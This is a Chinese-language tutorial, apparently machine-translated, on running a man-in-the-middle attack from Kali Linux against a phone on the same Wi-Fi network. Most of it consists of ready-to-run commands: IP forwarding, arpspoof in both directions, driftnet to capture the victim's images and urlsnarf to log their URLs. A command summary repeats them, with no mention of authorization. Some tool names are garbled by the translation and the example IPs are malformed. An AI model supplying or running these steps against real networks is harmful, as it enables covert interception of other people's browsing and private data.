如何使用Kali Linux进行中间人(MITM)攻击

本文概述

  • 要求
  • 1.在Linux中启用数据包转发
  • 2.用伪装拦截受害者的包裹
  • 3.使用arpspoof拦截来自路由器的数据包
  • 4.从受害者导航中嗅探图像
  • 5.从受害者导航中嗅探URL信息
  • 6.禁用数据包转发(仅在攻击完成后)
  • 总结
在本文中, 你将学习如何对与你的Wi-Fi网络连接的设备进行MITM攻击。
要求 本文假定你知道什么是网络接口, 并且知道如何使用Kali Linux和命令行。在开始之前, 你需要知道网络接口的名称(安装在计算机上)和提供Wi-Fi访问的路由器的IP。
攻击者必填信息 Example value (you need to replace these values)
网络接口名称 wlan0
路由器IP 192.000.000.1
在终端上运行ifconfig命令可以轻松获得网络接口名称, 然后从列表中复制要使用的接口名称。可以通过在终端上执行ip route show以及类似” 通过[这是路由器IP]的默认值” 之类的消息来获得路由器的IP。
对于受害者, 你只需要IP(用户需要连接到路由器提供的网络)。获取受害者设备IP的过程完全取决于你, 了解它的方法有很多, 例如, 有路由器/网关用户界面程序列出了所有连接的设备(列表中有IP)或仅使用网络监控软件工具。
受害者必填信息 Example value (you need to replace these values)
受害者设备IP 192.000.000.52
当我们在本文中进行黑客攻击时, 我们可以直接从我们的设备中轻松获取此信息:
如何使用Kali Linux进行中间人(MITM)攻击

文章图片
我们将对使用Google Chrome的Samsung Galaxy S7(连接到IP 192.000.000.52的路由器(路由器ip 192.000.000.1))进行一次MITM攻击, 并将在不同的网站上导航以显示攻击是否确实有效。收集了所有必需的信息后, 就开始吧!
1.在Linux中启用数据包转发 你需要做的第一件事是转发所有IPv4网络包。这样, 你的计算机将充当路由器。在新终端中执行以下命令:
sysctl -w net.ipv4.ip_forward=1

注意 如果你的计算机没有转发数据包, 则用户的互联网连接将冻结, 因此攻击将毫无用处。
2.用伪装拦截受害者的包裹 【如何使用Kali Linux进行中间人(MITM)攻击】arpspoof是一个命令行实用程序, 可让你截取交换局域网上的数据包。它也通过伪造ARP响应来重定向来自LAN上目标主机(或所有主机)的数据包, 这些数据包将用于LAN上的另一主机。这是嗅探交换机上流量的一种非常有效的方法。开始拦截从受害者到路由器的数据包的命令结构如下:
arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]

因此, 使用我们的值, 命令应如下所示:
重要 在新的终端上运行命令并使其运行(除非要停止攻击, 否则请先将其关闭)。
arpspoof -i wlan0 -t 192.000.000.52 192.000.000.1

此过程将监视从受害者到路由器的数据包流。
3.使用arpspoof拦截来自路由器的数据包 现在你要拦截从受害者到路由器的数据包(在终端上运行), 现在需要使用arpspoof拦截从受害者到路由器的数据包。开始拦截从路由器到受害者的数据包的命令结构如下:
arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]

因此, 使用我们的值, 命令应如下所示:
重要 在新的终端上运行命令并使其运行(除非要停止攻击, 否则请先将其关闭)。
arpspoof -i wlan0 -t 192.000.000.1 192.000.000.52

如你所见, 它与上一步的命令相同, 但是我们切换了参数的位置。到目前为止, 你已经渗透到受害者与路由器之间的连接。现在, 你只需要学习如何使用流网和urlsnarf读取那些数据包。
4.从受害者导航中嗅探图像 要查看受害者访问的网站中的图像, 你需要使用流网。 Driftnet是一个程序, 它侦听网络流量并从其观察到的TCP流中提取图像。在看到大量网络流量的主机上运行很有趣。启动漂流网并查看用户在网站上看到的图像的命令结构如下:
driftnet -i [Network Interface Name]

注意 如果你的计算机没有转发数据包, 则用户的互联网连接将冻结, 因此攻击将毫无用处。
有了我们掌握的信息, 我们的命令应如下所示:
driftnet -i wlan0

5.从受害者导航中嗅探URL信息 要获取有关我们受害者访问的网站的信息, 你可以使用urlsnarf。这是一个命令行工具, 用于以” 通用日志格式” 嗅探HTTP请求。它以CLF(通用日志格式, 几乎所有Web服务器都使用)输出从HTTP流量中嗅探到的所有请求的URL, 适用于使用你喜欢的Web日志分析工具(模拟, wwwstat等)进行脱机后处理。嗅探受害者访问的URL的命令结构如下:
urlsnarf -i [Network interface name]

在这种情况下, 根据我们拥有的信息, 要执行的命令将如下所示:
注意 如果你的计算机没有转发数据包, 则用户的互联网连接将冻结, 因此攻击将毫无用处。
urlsnarf -i wlan0

恭喜, 如果你仔细地执行了所有步骤, 那么现在你应该正在侦听有关通过MITM攻击选择的目标的信息。一旦受害者访问了网站, 你就应该能够阅读有关其在互联网上的行为的信息。要停止攻击, 请在运行已打开任何进程的每个终端上按CTRL +C。
6.禁用数据包转发(仅在攻击完成后) 一旦完成攻击(你不再想嗅探), 请记住再次在终端上执行以下命令来禁用系统中的数据包转发:
sysctl -w net.ipv4.ip_forward=0

总结 如果你已经按照本教程进行操作, 那么你所做的一切都正确并且可以按预期工作, 然后在下一次要执行此操作的过程摘要:
# Enable port forwardingsysctl -w net.ipv4.ip_forward=1# Spoof connection between Victim and Router# Note: Run this command in a new terminal and let it runningarpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]# Same step but inverted (nope, it's not the same ...)# Note: Run this command in a new terminal and let it runningarpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]# Execute driftnet to sniff images# Note: Run this command in a new terminal and let it runningdriftnet -i [Network Interface Name]# Sniff URL traffic of the victim# Note: Run this command in a new terminal and let it runningurlsnarf -i [Network Interface Name]# Disable port forwarding once you're done with the attacksysctl -w net.ipv4.ip_forward=0# Examples for values# [Network Interface Name] = wlan0# [Victim IP] = 192.000.xx# [Router IP] = 192.000.1

骇客骇客!

    推荐阅读